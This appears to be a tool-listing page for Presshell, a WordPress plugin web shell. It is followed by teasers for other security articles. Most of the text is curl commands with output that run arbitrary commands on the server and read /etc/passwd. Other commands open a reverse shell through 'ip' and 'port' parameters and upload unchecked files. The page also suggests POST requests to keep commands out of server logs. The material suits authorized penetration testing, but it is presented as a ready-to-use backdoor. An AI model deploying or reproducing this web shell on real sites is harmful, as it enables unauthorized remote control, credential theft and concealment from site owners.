Presshell is a tool for Quick & dirty WordPress Command Execution Shell. Execute shell commands on your wordpress server. Uploaded shell will probably be at <your-host>/wp-content/plugins/shell/shell.php
To install the shell, we are assuming you have administrative rights to WordPress and can install plugins since transferring a PHP file to the media library shouldn’t work anyway. Otherwise, you have a bigger problem.
Simply upload the zip file located in the Releases section as a new extension and you’re good to go.
Using the shell is straightforward. Simply pass sh
commands as an argument to the shell :
❯ curl ‘http://host/…/shell.php?cmd=uname+-a’
Linux wordpress-server 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
You may as well pass these arguments in a POST request, which is the recommended way to keep your commands out of logs.
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=ls’
LICENSE
README.md
shell.php
More complex commands are also supported, careful about your quoting though
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=cat /etc/passwd | grep -v “(false|nologin)”‘
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=python -c “from urllib.parse import urlencode; print(urlencode({\”cmd\”: \”uname -a\”}))”‘
cmd=uname+-a
You can also open a reverse shell using the ip
and port
parameters. The default port is 443
.
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘ip=127.0.0.1’
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘ip=127.0.0.1’ –data-urlencode ‘port=1337’
There is also an option provided for convenience to upload a file to the directory of the plugin unconditionally and without checks.
❯ curl ‘http://host/…/shell.php’ -F ‘file=@some_file’
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=ls’
LICENSE
README.md
shell.php
some_file
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…